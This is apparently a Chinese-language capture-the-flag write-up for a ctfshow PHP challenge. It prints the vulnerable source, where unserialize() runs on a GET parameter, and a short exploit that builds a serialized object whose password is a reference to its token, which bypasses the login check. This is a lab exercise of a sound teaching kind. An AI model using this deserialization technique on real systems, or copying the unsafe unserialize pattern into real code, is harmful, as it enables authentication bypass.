目录

• 源码
• 思路
• 题解
• 总结

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t,$p){
        $this->token=$t;
        $this->password = $p;
    }
    public function login(){
        return $this->token===$this->password;
    }
}

$ctfshow = unserialize($_GET['ctfshow']);
$ctfshow->token=md5(mt_rand());

if($ctfshow->login()){
    echo $flag;
}

思路

只要让password全等于token就好了,而token是一个经过md5加密后的随机数,爆破是很难解出来的,这里可以用php的引用,类似于C语言中的指针,这几天刚好在buu做过类似的

题解

exp

<?php
class ctfshowAdmin{
    public $token;
    public $password;

    // public function __construct($t,$p){
    //     $this->token=$t;
    //     $this->password = $p;
    // }
    // public function login(){
    //     return $this->token===$this->password;
    // }
}

$a = new ctfshowAdmin;
$a -> password = & $a -> token;
echo urlencode(serialize($a));
//O:12:"ctfshowAdmin":2:{s:5:"token";N;s:8:"password";R:2;}

总结

水题